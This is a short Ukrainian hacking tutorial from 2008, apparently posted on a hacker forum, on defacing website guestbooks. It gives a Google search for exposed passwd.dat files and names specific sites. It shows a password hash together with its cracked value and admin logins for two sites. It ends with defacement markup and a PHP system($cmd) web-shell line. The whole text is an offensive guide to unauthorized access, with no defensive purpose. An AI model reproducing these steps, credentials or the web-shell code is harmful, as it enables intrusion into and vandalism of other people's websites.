Дефейс за 2 хвилини!
Ласкаво просимо! Ви давно хотіли зробити дефейс, але нічого не виходило? Сьогодні ми розберемо дефейси гостьових, скажу відразу це буде непросто, а дуже просто! Приступимо!
Для початку спробуємо знайти вразливі гостьові, відкриваємо www.google.ru/ і вбиваємо такий запит:

filetype:dat passwd

Команда filetype:dat passwd знайде всі файли з розширенням dat, слово passwd говорить про те, що треба шукати файл passwd.dat де і зберігаються паролі від адмінки гостьовий!
Вибираємо гостьову за смаком я взяв:

www.otsema.ru/gostevaya2/guest.php

заходимо в каталог (може називатися, і по-іншому дивіться самі)

www.otsema.ru/gostevaya2/

Знаходимо файл passwd.dat (хоча гугл відразу дає посилання на www.otsema.ru/gostevaya2/ passwd.dat) відкриваємо його і бачимо щось схоже на це:

Копіюємо хеш пароля 32946e1a7a215c7cbe69554fcaeb98b7 і йдемо сюди

md5.xek.cc/index.php

розшифровуємо (сподіваюся — це проблем не складе), виходить 999222, тепер назад

www.otsema.ru/gostevaya2/

і шукаємо файл admin.php знайшли? Відкриваємо.
Вводимо логін samsn і пароль 999222.
Тепер ми в адмінці там можна редагувати дизайн і змінювати налаштування, але не завжди буває так, іноді варто заборона на редагування, а іноді адмінка просто не дає можливостей це зробити як тут:

www.sozdaysait.net.ru/uchot/admin.php?login
Логін: admin
Пас: 1234

переходимо на вкладку дизайн стираємо все і пишемо:

[tittle][h1][tt] Hacked by net ne vasy[tt][/h1][/tittle]

Тепер у вікні гостьовий буде напис Hacked by net ne vase. Можна взяти код і потужніший c використанням java і зробити дуже красивий дефейс
Так само можемо додати і такий код:

[?system($cmd);?]

…..
На сьогодні все знак “[” замінює знак менше, знак “]” замінює більше.

29 липня 2008 р. 17:02
Kerny для www.hackzona.ru
Пишіть по — більше відгуків це моя перша стаття. І не судіть строго!